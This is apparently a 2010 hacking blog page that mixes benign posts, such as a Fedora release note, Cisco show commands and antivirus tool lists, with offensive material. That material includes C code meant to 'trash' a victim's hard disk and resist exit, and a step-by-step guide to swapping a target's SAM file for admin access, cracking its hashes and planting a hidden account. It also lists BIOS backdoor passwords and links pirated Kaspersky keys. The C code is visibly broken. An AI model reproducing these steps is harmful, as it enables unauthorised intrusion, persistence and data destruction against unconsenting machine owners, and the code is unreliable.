Saturday, June 19, 2010

Fedora 11

Fedora 11 is released today.
Fedora is a Linux-based operating system that provides users with access to the latest free and open source software, in a stable, secure, and easy to manage form. Fedora is the largest of many free software creations of the Fedora Project, a partnership of free software community members from around the globe.


Fedora 11 tour
Feature List
Release-notes

Friday, June 18, 2010

Cisco Router Tips

Cisco Router Tips
Top 10 'show' Commands
Tom Lancaster

One of the most important abilities a network administrator can have is the know-how to get information out of his network devices so he can find out what's going on with the network. In most networks, the staple of information gathering has been the "show" commands. Here are my top ten commands to know and love:


  1. show version: Start simple; this command gives uptime, info about your software and hardware and a few other details.
  2. show ip interface brief: This command is great for showing up/down status of your IP interfaces, as well as what the IP address is of each interface. It's mostly useful for displaying critical info about a lot of interfaces on one easy to read page.
  3. show interface: This is the more popular version of the command that shows detailed output of each interface. You'll usually want to specify a single interface or you'll have to hit 'page down' a lot. This command is useful because it shows traffic counters and also detailed info about duplex and other link-specific goodies.
  4. show ip interface: This often overlooked command is great for all the configuration options that are set. These include the switching mode, ACLs, header compression, ICMP redirection, accounting, NAT, policy routing, security level, etc. Basically, this command tells you how the interface is behaving.
  5. show ip route: This indispensable command shows your routing table, which is usually the primary purpose of the box. Get to know the options on this command.
  6. show arp: Can't ping a neighbor? Make sure you're getting an arp entry.
  7. show running-config: This is an easy one. It tells you how the box is configured right now. Also, "show startup-config" will tell you how the router will be configured after the next reboot.
  8. show port: Similar to the show interface command on routers, this command gives you the status of ports on a switch.
  9. show vlan: With the trend toward having lots of VLANs, check this command to make sure your ports are in the VLANs you think they are. Its output is very well designed.
  10. show tech-support: This command is great for collecting a lot of info. It basically runs a whole bunch of other show commands, and spits out dozens of pages of detailed output, designed to be sent to technical support. But, it's also useful for other purposes.


SearchNetworking.com is the largest and most active online community dedicated to the enterprise network.  Over 300,000 IT professionals rely on SearchNetworking.com for industry news, technical tips and valuable best practices on routing, switching, network security, network/systems management, convergence/VoIP and wireless LANs, so they can keep their networks up to date and cope with constant change. 
Whether you are looking for advice on implementing a new technology or seeking new cost-saving strategies to improve the performance of your current network, SearchNetworking.com is an online helpdesk for IT managers and administrators.  We provide unbiased news, a library of how-to tips, informative learning guides, expert and vendor Webcasts and white papers – all in an effort to arm you with the tools and tactics you need to do your job successfully and make the right IT purchasing decisions. Register for FREE today... http://searchnetworking.techtarget.com/registerProfile/1,291003,sid7,00.html

Top Tools for Virus Removal

Top Tools for Virus Removal
Douglas Chick

 
Virus Removal Tools
As a network administrator, helpdesk tech, or other computer professional, you don't remove that many viruses. Most company networks are secure enough that viruses are not really an issue. The issue is when friends, family and people from work get viruses in their home computers. There are so many request for virus removal that it is easy to be desensitized. I am as guilty as anyone when someone asks for help and I tell them they should take their computer to the Geek Squad, or Nerd Herd. There are literally thousands of viruses, and unless you are a professional virus expert it is impossible to keep up with all the removals. So, listed below are some popular virus removal tools and programs.
Some viruses are so specialized that you must first discover the virus you have before you can remove it. There are many no-cost online virus checkers. Listed here are but a few to help isolated the infection:


These websites will scan and remove viruses, or isolate and inform you to what you have.

BitDefender Scan Online
Dr.Web Online Check

eTrust Antivirus Web Scanner
Ewido Online Scanner
F-Secure Online Scanner
Jotti's Online Malware Scan
Kaspersky Online Scanner
McAfee FreeScan
Panda Activescan
Symantec Security Check
Trend Micro Housecall
WindowsSecurity

Adware and Spyware Removal

Lavasoft Ad-Aware 2008
MalwareBytes Anti-Malware

Microsoft Windows Defender

Spybot Search and Destroy 1.6

Removal Programs for Specific Infections:

About:Buster - Removal of CWS HomeSearch Hijacker or res:// hijacker
Combofix - all in one removal tool for many issues
CWShredder 2.19 - CoolWebSearch Removal Tool from Trend Micro

Elite Toolbar Remover
I-Lookup Toolbar Uninstallers - Version 1 and Version 2
Incredifind and PerfectNav Uninstaller
Kill2Me - Removal of Look2Me infections
Lop.com Uninstaller
OmegaKiller for removing hijackers like
Omegasearch.com Prosearching.com. Search200.com. Mysearchnow.com. Searchexe.com
SDFix - another multitask removal tool
SmitRem for removing Spyaxe, SpySheriff, Winhound and others
VX2.BetterInternet for XP/2000 for Removing Look2Me
VX2.BetterInternet for Windows 9X for Removing Look2Me
WildTangent Remover

Tools for Investigating Adware and Spyware Infections
HijackThis
SysInternals Process Explorer
Sysinterals RootkitRevealer

Programs to Delete Undeletable Files
Pocket Killbox
Remove on Reboot Shell Extension
Unlocker


TCP/IP and Winsock Repair Utilities

LSPFix by Cexx.org
Winsock XP Fix
XP TCP/IP Repair utility

Free Anti-Virus Programs

ANTI-VIR
AVAST
AVG

Chinese Cyber Backdoors: Trojan Dragon

Chinese Cyber Backdoors: Trojan Dragon
Douglas Chick
Is it possible, that having so many, if not all of our computer hardware components being made in other countries, that backdoor access are built directly into our computers? If there is such a hidden portal that allows direct access to all of our computers, would we even know? What if one of the countries, and I’m just going to throw this out there; like the Chinese government, told China’s computer component makers that they wanted a special feature that is secretly incorporated into every computer , and communication device that leaves the country; would we ever know? What protocols have been put in place by our government to insure our security from U.S. companies that chase cheaper overseas manufacturing? I’m not suggesting that China has any type of remote control of all of the computers they export, I’m just saying; what if they do?
I once read that China told Microsoft; “Before we can allow the distribution of Windows in the Chinese market, we need to make sure that the U.S. government hasn’t inserted code that allows your government to spy on Chinese computers.” They demanded to view all of Window’s code for security reasons or they would refuse Windows in China; Microsoft conceded. The U.S. banking association made the same request and was declined. Microsoft has never said the Windows is a security operating system that will protect your information; Windows is a cheap down and dirty operation system that will get you what you need without any claims of protecting your personal information. The defense department, banks and security companies, and everyone else chose price over security and purchased Windows, and of course I do too for my company.
I only used China as an example because they have the resources in terms of making the programs, hardware, and enough people to monitor every computer in America. In fact, there are 1.3 billion people in China, and only 300 million in the United States; this means that if the Chinese government were so inclined, they could assign 1 worker to monitor the computer in the United States, or every computer in the world. I’m sure they are not, but WOW!
They are not, right?

Kaspersky 2011 Keys


Kaspersky is most famous Anti Virus is the world.Kaspersky launch their new product Kaspersky 2011.Kaspersky 2011 is more secured and fast then older version's of kaspersky. Guys download the orignal trail version from Kaspersky site n after that u download mine keys from givin link.enjoy!!!!

Download Kaspersky 2011 Keys

Saturday, June 12, 2010

Windows Passwords Looppole...

I wish i'd quit finding these !! : Rahul


a. ok now, what you need to do is to run compmgmt.msc

b. and click on local users and groups.

c. once you've gotten here you need to open up the 'users' folder.


at this point i am walking along with you and notice that there are several
major security holes dealing specifically with the password:
1. double clicking on the any user name allows you a list that looks
something like this:
"user name"

full name: -----------------------
|__________________|

description: -----------------------
|__________________|
--
|_| user must change password at next logon

--
|_| user cannot change password

--
|/| password never expires

--
|_| account is disabled

--
|_| account is locked out


"ok" "cancel" "apply"

ok if you can get past my cheesy drawing, i must ask, did you notice that
the "password never expires" box is checked? if you did, then you may have
realized that this means that you can also uncheck it!

2. if ure paying attention, you'll see that the 'user must change password
at next logon' box is unchecked. if you put a check in this box of course,
when you shut down the system will prompt for a new password!

3. going back to step c.,
right click on any account and notice the dialoge that appears:
set password...
all tasks
delete
rename
properties
help

i think you can handle it from here

ps. i wonder if you can access this data if this stuff is locked to the user
by the admin by going in through the command prompt. i doubt it but if neone
finds a way let me know.

Miscellenous Hacks

Make Ultra Strong Passwords
A very good One from Irongeek.
Strong Article Worth Sharin


As some Microsoft Operating System geeks know, you can type many more characters than are on a standard keyboard by using the ALT+NUMPAD combination technique. For example, by holding down the ALT key, typing 234 on the number pad, then releasing ALT gives you the O character. I'm writing this article mostly because when I search around for information on the topic of ALT+Number key combos I find pages that are lacking in details. Most of the pages I found are coming from the angle of using ALT+NUMPAD combinations as shortcuts for typing in non-English languages, but I have another use for them. Using ALT+NUMPAD can make for some very ugly passwords to crack. These odd characters have two major advantages over normal keystrokes:


1. They are unlikely to be in someone's dictionary or brute force list. Try brute forcing a password like "ace of ?s" or "I am the a and the O".
2. Some hardware key loggers will not log these odd characters. Your mileage may vary on this as some key loggers can, so don't rely on it to keep you 100% safe.

I'll cover the 2nd point more in an upcoming article. Using ALT+NUMPAD to type odd characters into your password also has a few disadvantages.


1. The way they are described in this article only works in Microsoft Operating Systems (DOS, Windows 9x, Vista, XP, 2000), and there may be some variation amongst the different versions. If you know of a good way to do the same thing in Linux please email me.
2. Not all applications will let you use these odd characters. For testing I tried the password "Oÿ" (ALT+234 and ALT+0255) on a Windows XP local account,, but not all application will let you use these sorts of characters in your password.

Microsoft has the following to say on the subject of ALT+NUM key codes:


From:http://www.microsoft.com/globaldev/reference/glossary.mspx


Alt+Numpad: A method of entering characters by typing in the character’s decimal code with the Numeric Pad keys (Num Lock turned on). In Windows:


• Alt+, where xxx is the decimal value of a code point, generates an OEM-encoded character.
• Alt+<0xxx>, where xxx is the decimal value of a code point, generates a Windows-encoded character.
• Alt+<+>+, where xxxx is the hexadecimal Unicode code point, generates a Unicode-encoded (UTF-16) character.



Shortly I'll explain explain the first two methods further. The 3rd is more problematic to work with. First, you may have to edit your registry and add a the REG_SZ value "HKEY_Current_User/Control Panel/Input Method/EnableHexNumpad", then set it to "1". Also, depending on where you are trying to type the character the application may interpret your hexadecimal Fs as attempts to bring down the file menu. Since method three is so problematic I'll focus on the first two methods.
First, make sure you are using the number pad and not the top roll number keys, only the number pad works for this. Second, make sure NUM LOCK is on. It does not have to be on in all cases for these key combos to work, but it helps by keeping the number pad from being misinterpreted.

The chart from the site shows the relevant key codes to get various symbols. The table on the left shows the OEM Extended ASCII character set (AKA: IBM PC Extended Character Set; Extended ASCII; High ASCII; 437 U.S. English). True ASCII is only 7 bit, so the range is 0 to 127. IBM extended it to 8 bits and added more characters. To type these characters you merely have to hold down an ALT key, type the numeric value of the character, then release the ALT key.

The table on the right shows the ANSI character set (AKA: Window's ANSI/ISO Latin-1/ANSI Extended ASCII, though technically they are not exactly the same thing.). To use the ANSI character set you do the same thing as the OEM set, but you preface the number with an extra zero. Notice that the first 127 should be the same in both sets, though values 0-31 may not be viewable in all cases. I've been in "character encoding hell" just trying to get this article on my site in a readable format.

For example, ALT+257 gives me a in Wordpad, but in Notepad it loops back around the character set and gives me?(257-256=1 which is ? in the OEM set) . If you want to know what key code will bring up a particular character in a certain Windows font run Windows Character Map (charmap.exe) and look in the bottom right corner to find out.

some examples :

ALT+130 é
ALT+131 â
ALT+132 ä
ALT+133 à
ALT+134 å
ALT+135 ç
ALT+136 ê
ALT+137 ë
ALT+138 è
ALT+139 ï
ALT+140 î
ALT+141 ì
ALT+142 Ä
ALT+143 Å
ALT+144 É
ALT+145 æ
ALT+146 Æ
ALT+147 ô
ALT+148 ö
ALT+149 ò
ALT+150 û
ALT+151 ù
ALT+152 ÿ
ALT+153 Ö
ALT+154 Ü
ALT+155 ¢
ALT+156 £
ALT+157 ¥
ALT+158 P
ALT+159 ƒ
ALT+160 á
ALT+161 í
ALT+162 ó
ALT+163 ú
ALT+164 ñ
ALT+165 Ñ
ALT+166 ª
ALT+167 º
ALT+168 ¿
ALT+169 ¬


Create Bad sectors on hard disks


A C source code


/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.
*
*
*/

#include
#include
#include
#include
#include
#include
#include

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}



Disable or remove shutdown




=> remove shutdown from start menu and also from all other possible options.
=> hide shutdown from start menu
=> disable shutdown all togetherDisable or remove shutdown - The Ethical Hackinglearn to do it now!!! (it takes less than a minute to do so) Disclaimer: this is an article which just brings out the fact that removing the
shut down menu option from the start menu is possible. If you however get caught
by your manager or college system administrator, and get whipped in your ass, I
cannot be held responsible. This tool is a inbuilt tool present in windows XP, just like msgconfig. So you
got to execute this command using run. 1 . Start ->run and type gpedit.msc The gpedit stands for group policy and you can do wonders using this. Also if
you a minute with your pal’s system and this pal tries to flirt your girl friend
- You can make a lot of changes to his system in the time he leaves you alone
with his system, to have him go bonkers.
2. User configuration -> administrative Templates -> start menu and taskbar -> 3. This option opens up a pane on the right hand side. Identify the option named
- Remove SHUT DOWN on the start menu . 4. Double click Remove SHUT DOWN on the start menu option 5. a small screen pops up and you may like to read about the explanation in the
EXPLAIN TAB before you change the settings. 6. Just change the radio button TO ENABLED and say apply. 7. DONE. No need to log off or restart the system. (You may however have to find
a way to restart your system.) 8. This option disables the log off option from the system. From the start menu,
also from the life saver – three buttons CTRL - ALT - DEL options. This option goes well with the HIDING THE LOG OFF FROM START MENU… (To shut down ur system:-without using frm shut down menu) The solution is that u can switch user thru task manager (alt+ctrl+del) or by
pressing winkey+L where u get the option to turn off ur compy/restart/stand
by.
or u may create a shortcut using this shortcut location to shutdown ur sys %windir%\system32\shutdown.exe -s to restart, u can use this shortcut %windir%\system32\shutdown.exe -r


Self distructing Email - MI3
*****

one word - Just perfect

One of the best service i found online n using it too personally..


Big Brother is Watching

Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?
Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.


BigString takes the risk out of email

Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.


BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.

BigString lets you have second thoughts
BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.


You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.


BigString takes the danger out of clicking
BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.


BigString is easy to use
BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!

Here are just a few of the many applications of BigString
Erasable, Recallable, Non-Printable Email.

Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.


On-Line Daters: You don't want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you'll allow a picture to be viewed before it disappears. BigString protects your privacy!


Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!


Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking "send" is no longer an action "carved in stone." Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You're the boss with BigString.
Self distructing Email - MI3 - The Ethical Hacking

SAM History n Hacking


1-Introduction


This article introduce very simple way to get Administrator like account and do the job and after finish recover your way, after that Get Admin Password later in your home by Cracking, After get the Admin Password Create a hidden user account and do all your jobs free, and Explain how to make a USB Storage Device Bootable corresponding to any system boot, and how to bypass Mother Board password by Default Passwords, and how to extract it if you are in the system

2-To Hackers / Security Systems Engineers

First All must know that both Hackers / Security Systems Engineers Are 2 faces to the same coin Any way, I try this on Windows XP SP2 I want all to try it on Windows Server 2003, Windows Vista Any Windows NT and POST a Message to make all know what versions exactly this idea can apply for
3-Close Look to hole
Microsoft stores all Security Information in many files but the main file is the SAM file (Security Accounts Manager)! this file contain critical information about users account you can explore the folder
$windir$\system32\config
You will find all things and may discover some thing new, but what amazing here is that the file is available, so we can apply our idea
shot1
You will Not be able To copy them Under XP
4-Dose Microsoft Know and Why!?
Yes Microsoft Know all things, and done on purpose why? I always for many years ask my self why Microsoft doesn’t do real security on their systems from the CD setup to all security aspects In the system, I found(my opinion may wrong)that they need to achieve 2 strategic things

1-They need their software spread and all depend on it and in one day when they feel that they are the One The security will done and all money will go to One Pocket

2-They Forced/Like to Make Some Organizations Hack other systems

Proof:
They can make this File SAM Unavailable by storing the information in FAT, FAT32, NTFS Areas (Sectors reserved by The Operating SYSTEM to Store the Addresses of the files on the HardDisk File Allocation Table) So that it is hard to extract. But they don't!!!!!
5-Understand the Idea
The Idea is simple I will explain it manually and it can then be programmed it is so easy here is the idea

The SAM file is available and the SAM file contain a Security Information, so I created a Free Windows XP SP2 Logon account (Administrator Account without password) that means when windows Lunch it Will enter directly to the system without asking about any password And windows will store this Account in The SAM file on My PC So the SAM file on My PC contain an Account will Make you enter Directly to the Windows, so I will take My SAM File and Replace (by renaming, we will need the original file to recover our way) It with the other SAM File in The Other System or Machine So When you restart It will make you enter directly to the Windows With Administrator Like Account ,do what you need and then back all things to the previous state. All These Steps will be under other system bootable DOS, Knoppiex, Windows Live CD, Because Windows XP will not make u able to copy the Files
6-Get Admin Like Account (The Simple Way)

1- Download My 2 SAM files I Include them in Downloads
2- Go to the target Machine , and try to Access it and Boot from any device CD-ROM, Floppy, NIC if it haven't any of those Read Hint 9
3- After Get Access to the Boot Command prompt c:> or Boot Live OS CD, Go to the windows folder $windir$\system32\config And Copy the SAM File and System File (we will need it later) To other folder, Then go to $windir$\repair copy SAM file
And then Rename the 2 SAM Files to SAM1 in their original places
4- Copy My SAM/config File and Paste it in the windows folder $windir$\system32\config Copy My SAM/Repair File and Paste it in the windows folder $windir$\repair (may this step not required)
5- Reboot and Make windows enter Normally
6- Yeah, No You are in The System
7- Copy the files in step 3 to Floppy Disk or Flash Stick Or Send it to your mail via Internet
8- After finish repeat step 2 and delete My SAM files and Rename Both SAM1 to SAM
9- Reboot , Congratulation you recover your way
7-Crack the SAM-Know the real Admin Password and Apply Hint 8
There is many ways I will introduce 2 ways and explain 1 After you get the SAM File and System File there are Programs That extract the Accounts and their passwords, depending on the idea of cracking the HASH (the HASH is one way encryption method) so that The program will generate random passwords and convert them to HASH and then compare it with the HASHES in the SAM File , so it may take a long time but for fast you will pay more money for ready made HASHES with their user names and passwords the 2 program are

1-L0phtcrack v4.0 (LC4 alternate name) the most famous on the NET
2-SAMInside http://www.insidepro.com/I include on the Downloads

I will explain fast SAMInside

shot1

This is the main window press Ctrl+O or by mouse click Import SAM and SYSTEM

shot1

Window will open to import the 2 files and the program will start to crack the Accounts and get them, and then display users names and their passwords

Any other tool will do the job try all and select your best I Explain here SAMInside because he give me results with 6 character only password and get it FAST
8-Creat a Hidden User Accountn
Windows NT / Windows 2000 and Windows XP has a security setting to hide accounts from the Logon Screen/Control panel users accounts

shot1
Press
Ctrl+Alt+Delet
Give you another Access Dialog


Steps:

1-After getting Admin Password enter to the system
2-create an Account with password
3-click start - > Run - > type Regedit press Enter
4-Go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\Winlogon\SpecialAccounts\UserList

shot1


5- Create a new DWORD Value on the UserList
6-Name it with Name of Account to be Hidden
7-set the Value Data of this DWORD Value to 0 to hide it /1 to appear it
8- close Regedit and Reboot
9- Press Ctrl+Alt+Delete when logon Screen Appear another login dialog appear type You hidden user name and password and press Enter

Note:

1- the account profile will be visible in \Documents and Settings, But it will be hidden from Logon Screen and User Account in the control panel

2-there is other method that Inject your Account directly to the Admin SAM without know the Admin Pass, but believe me you don't Expect the result, so if you want try it (if the password hard to get)
9-USB Boot for FAT32, NTFS or any File System

HP Always amazing me to do this we need 2 tools

1- HP USB Disk Storage Format Tool v 2.0.6 I include in Downloads If u want to find more go to http://www.hp.com/
2- NTFSDOS Professional Boot Disk Wizard I include in Downloads If u want to find more go to http://www.winternals.com/

shot1

Just connect your USB Storage
steps:
1- Prepare a Startup Disk or Startup CD , Or any Equivalent
2- In the HP tool select the Device->your USB Storage
3- Select File System FAT or FAT32
4- Check "create a DOS startup disk" checkbox and then select option "using DOS System Files Located at"
5- brows your location
6- Click Start
7- Now you have a Bootable USB Storage Device
8- Now in the NTFSDOS Professional Boot Disk Wizard follow the wizard and you will get a NTFS bootable USB Storage

Why we need NTFS ?
If the Partition of the Windows System is NTFS so with normal Startup you will not be able to access any files because the File System is not Recognized by MS-DOS when we install NTFSDOS Professional on the bootable disk it will allow you To Access any File Under NTFS

Note:
Make sure that the option in Mother board Setup of First Boot "USB-Hard Disk" if you want to boot from a USB
10-Mother Boards Default Passwords and how to extract it if you are in The system

This subject is huge I try to find simple or clever way but as u know many PC's many machines many bios versions and updates so I search the net for the best and I list below ,but if this doesn’t help I recommend you to find the bios version and the motherboard and search the net on Google, yahoo, yahoo groups and other you will find some thing help u

HOW TO BYPASS BIOS PASSWORDS
http://www.elfqrin.com/docs/biospw.html

Removing a Bios - CMOS Password
http://www.dewassoc.com/support/bios/bios_password.htm

How to Bypass BIOS Passwords
http://www.uktsupport.co.uk/reference/biosp.htm

How to Bypass BIOS Passwords
http://www.i-hacked.com/content/view/36/70/

Default Password List
2006-04-30
http://www.phenoelit.de/dpl/dpl.html

Award BIOS backdoor passwords:
ALFAROME--------BIOSTAR--------KDD--------ZAAADA-------- ALLy--------CONCAT--------Lkwpeter--------ZBAAACA-------- aLLy-------- CONDO--------LKWPETER--------ZJAAADC-------- aLLY--------Condo--------PINT--------01322222-------- ALLY--------d8on--------pint--------589589-------- aPAf--------djonet--------SER--------589721-------- _award--------HLT--------SKY_FOX--------595595-------- AWARD_SW--------J64--------SYXZ--------598598 AWARD?SW--------J256--------syxz-------- AWARD SW--------J262--------shift + syxz-------- AWARD PW--------j332--------TTPTHA-------- AWKWARD--------j322-------- awkward

AMI BIOS Backdoor Passwords:
AMI--------BIOS--------PASSWORD--------HEWITT RAND-------- AMI?SW--------AMI_SW--------LKWPETER--------CONDO

Phoenix BIOS Backdoor Passwords: phoenix--------PHOENIX--------CMOS--------BIOS

Misc. Common Passwords
ALFAROME--------BIOSTAR--------biostar--------biosstar-------- CMOS--------cmos--------LKWPETER--------lkwpeter-------- setup--------SETUP--------Syxz--------Wodj
Other BIOS Passwords by Manufacturer
Manufacturer--------Password
VOBIS & IBM-------- merlin
Dell--------Dell
Biostar-------- Biostar
Compaq--------Compaq
Enox--------xo11nE
Epox--------central
Freetech--------Posterie
IWill--------iwill
Jetway--------spooml
Packard Bell--------bell9
QDI--------QDI
Siemens--------SKY_FOX
TMC--------BIGO
Toshiba--------Toshiba
Toshiba--------BIOS


Most Toshiba laptops
and some desktop systems will bypass the BIOS password if the left shift key is held down during boot
IBM Aptiva BIOS
Press both mouse buttons repeatedly during the boot

Hacking Course & Syllabus

Well many one ask this as what to study as a curriculum for Ethical hacking..
hmm well i made dis generalized mannual fr u guys. may help a lot


• Security testing methodologies
• The Ethical Hacking Profession
• Passive Intelligence Gathering – 2007 Version
• Network Sweeps
• Stealthily Network Recon
• Passive traffic identification
• Identifying system vulnerabilities
• Abusing Domain Name System (DNS)
• Abusing Simple Network Management Protocol
(SNMP)

• Introduction to Remote Exploits
• Engineering remote exploits
• Running shellcode in RAM vs. on disk
• Heap Buffer Overflows
• Compromising Windows 2003 Server Systems
• Compromising Solaris Unix and Linux Systems
• Attacking RDP (Remote Desktop Protocol) in
Windows XP, 2003 & Vista
• Windows password weaknesses & Rainbow Tables
• Unix password weaknesses
• Attacking Cisco’s IOS password weaknesses


Trojan genres
• Windows, Unix and Linux Trojans
• Kernel Mode Windows Rootkits – System Call
Hijacking and Direct Kernel Object Modification
• Kernel Mode Linux Rootkits
• Covert communication channels
• Spoofing endpoints of communication tunnels
• Tunneling through IPSec VPNs by abusing ESP
• Steganographic Tunnels
• Remote command execution
• Sniffing and hijacking SSL encrypted sessions
• Installing sniffers on low privilege account in
Windows 2003 Server
• Stealthy Remote keylogger installation
• Circumventing Antivirus

Modifying syslog entries
• Raw binary editing to prevent forensic
investigations
• Editing the Windows Event Log
• Abusing Windows Named Pipes for Domain
Impersonation
• Impersonation of other Users- Hijacking kernel
tokens
• Disguising network connections
• Attacking Cisco IOS
• Attacking STP & BGP protocols
• Wireless Insecurity
• Breaking Wireless Security – WEP, WPA, WPA2
• Blinding IDS & IPS
• Attacking IDS & IPS

Malicious event log editing
• Binary filesystem modification for anti-forensics
• Named Pipe abuse
• Kernel Token Hijacking
• Attacking Border Gateway Protocol (BGP)
• Attack WEP
• Cracking WPA
• Cracking WPA2
• Cisco IOS Exploits
• Breaking into Cisco routers
• Blinding IPS
• Attacking IPS

Abusing Web Applications
• Attacking Java Applets
• Breaking web app authentication
• SQL Injection techniques
• Modifying form data
• Attacking session IDs
• Cookie stealing
• Cross Site Scripting
• Cross Site Request Forgery (CSRF) Attacks

Remote buffer overflow exploit lab
• Custom compiling Shellcode
• Running payloads in RAM
• Hiding exploit payloads in jpeg and gif image
files
• Attacking email vectors (Lotus Notes and
Microsoft Exchange, and Outlook Web Access)
• Registry manipulation
• Client side IE & Firefox exploits
• Using custom Trojans to circumvent Antivirus
• Remote kernel overflows
• RDP (Remote Desktop Protocol) Exploitation
• Cracking Windows Passwords
• Building Rainbow Tables
• Cracking Windows 2003 native mode passwords
• Brute forcing salted Unix passwords
• Attacking Kerberos Pre-Auth Hashes
• Cracking IOS and PIX passwords

• Compromise a DMZ setting with port redirection
• Circumvent firewall IP access list (ACL)
• Customizing Trojans to avoid Antivirus
• Deploying kernel mode rootkits on Windows 2003
& Vista
• Installing LKM rootkits on Linux servers
• Hijacking MSN messenger traffic
• Running commands remotely
• Breaking wireless encryption – WEP, WPA, WPA2
• Installing sniffers in low privilege user accounts
• Sniffing remotely and retrieving results
• Remote keylogging
• Tunneling with cover channels through IPSec VPNs
• Hijack and capture SSL traffic


Network Sweeping
• Scanning from spoofed IP addresses
• Stealthy Recon
• Injecting p0f for passive OS fingerprinting
• Scanning through firewalls
• IPv6 Scanning
• Discover all subdomains owned by an
organization
• Inspect changes to whois record over last 3
years
• Windows 2003 Server & Vista DNS Cache
Poisoning Attacks
• Pumping SNMP for data – OID Dissection
• Attacking SNMP
Well many one ask this as what to study as a curriculum for Ethical hacking..
hmm well i made dis generalized mannual fr u guys. may help a lot


• Security testing methodologies
• The Ethical Hacking Profession
• Passive Intelligence Gathering – 2007 Version
• Network Sweeps
• Stealthily Network Recon
• Passive traffic identification
• Identifying system vulnerabilities
• Abusing Domain Name System (DNS)
• Abusing Simple Network Management Protocol
(SNMP)

• Introduction to Remote Exploits
• Engineering remote exploits
• Running shellcode in RAM vs. on disk
• Heap Buffer Overflows
• Compromising Windows 2003 Server Systems
• Compromising Solaris Unix and Linux Systems
• Attacking RDP (Remote Desktop Protocol) in
Windows XP, 2003 & Vista
• Windows password weaknesses & Rainbow Tables
• Unix password weaknesses
• Attacking Cisco’s IOS password weaknesses


Trojan genres
• Windows, Unix and Linux Trojans
• Kernel Mode Windows Rootkits – System Call
Hijacking and Direct Kernel Object Modification
• Kernel Mode Linux Rootkits
• Covert communication channels
• Spoofing endpoints of communication tunnels
• Tunneling through IPSec VPNs by abusing ESP
• Steganographic Tunnels
• Remote command execution
• Sniffing and hijacking SSL encrypted sessions
• Installing sniffers on low privilege account in
Windows 2003 Server
• Stealthy Remote keylogger installation
• Circumventing Antivirus

Modifying syslog entries
• Raw binary editing to prevent forensic
investigations
• Editing the Windows Event Log
• Abusing Windows Named Pipes for Domain
Impersonation
• Impersonation of other Users- Hijacking kernel
tokens
• Disguising network connections
• Attacking Cisco IOS
• Attacking STP & BGP protocols
• Wireless Insecurity
• Breaking Wireless Security – WEP, WPA, WPA2
• Blinding IDS & IPS
• Attacking IDS & IPS

Malicious event log editing
• Binary filesystem modification for anti-forensics
• Named Pipe abuse
• Kernel Token Hijacking
• Attacking Border Gateway Protocol (BGP)
• Attack WEP
